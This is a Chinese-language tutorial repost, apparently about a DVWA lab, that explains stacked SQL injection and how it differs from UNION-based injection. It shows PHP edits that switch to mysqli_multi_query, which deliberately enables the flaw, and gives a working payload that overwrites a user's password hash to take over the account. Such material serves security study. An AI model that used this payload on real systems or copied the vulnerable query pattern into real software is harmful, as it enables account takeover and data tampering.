标签：查询 堆叠 API query mysqli 注入

目录

• 与联合查询的区别
• 局限性
• 注入过程

• 多条SQL语句一起执行

与联合查询的区别

• UNION和UNIION ALL只能执行查询语句，堆叠注入可以执行任意语句
• 可能受到权限不足、数据库引擎和API不支持的限制，虽然场景少，但是威力大

局限性

• 通常只能返回一个查询结果，因此第二语句产生的错误或结果会被忽略
• 使用堆叠注入前需要知道数据库的一些相关信息

注入过程

• 用户密码经过单向散列后可能无法破解，可以利用堆叠注入修改用户密码字段的内容，成功登录后再修改回来
• 修改php文件中使用的API：

  $result = mysqli_query($GLOBALS["___mysqli_ston"], $query);
  # 使用的原API
  mysqli_multi_query($GLOBALS["___mysqli_ston"], $query);
  $result = mysqli_use_result($GLOBALS["___mysqli_ston"]);
  # 可以使用堆叠注入的API
  

• 修改完成后验证能否正常查询
• payload：

  id=1';update users set password='21232f297a57a5a743894a0e4a801fc3' where user_id=1; --;&Submit=Submit#
  

标签：查询,堆叠,API,query,mysqli,注入
来源： https://blog.csdn.net/yybzzz/article/details/116912606

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。